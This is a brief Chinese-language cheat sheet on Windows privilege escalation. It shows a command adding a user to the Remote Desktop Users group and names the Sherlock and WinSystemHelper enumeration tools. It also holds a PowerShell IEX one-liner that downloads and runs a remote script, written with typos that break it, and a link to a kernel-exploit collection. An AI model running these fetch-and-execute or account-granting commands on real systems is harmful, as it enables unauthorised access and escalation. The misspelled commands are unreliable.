Windows提权与基本命令

dir /s /b xxx.txt  #在盘符上搜索文件

 

 

 

 

 

 net localgroup "Remote Desktop Users" wangfugui  /add    #将wangfugui添加到远程桌面组   有些时候虽然已经是管理员权限，但是还是无法进行远程桌面的连接，原因是因为没有加入到远程桌面组。

Windows提权总结： 

 

 

Windows 分析工具利用
1.WinSystemHelper-master
2.Sherlock
本地加载脚本
Import-Module Sherlock.ps1
远程加载脚本
IEX(New-Object System.Net.Webclient).DowningloadString('https://raw.githubsercontent.com/rasta-mouse/Sherlocak/master/Sherlock.ps1')
发现漏洞
Find-AllVulns

 

提权工具：

https://github.com/SecWiki/windows-kernel-exploits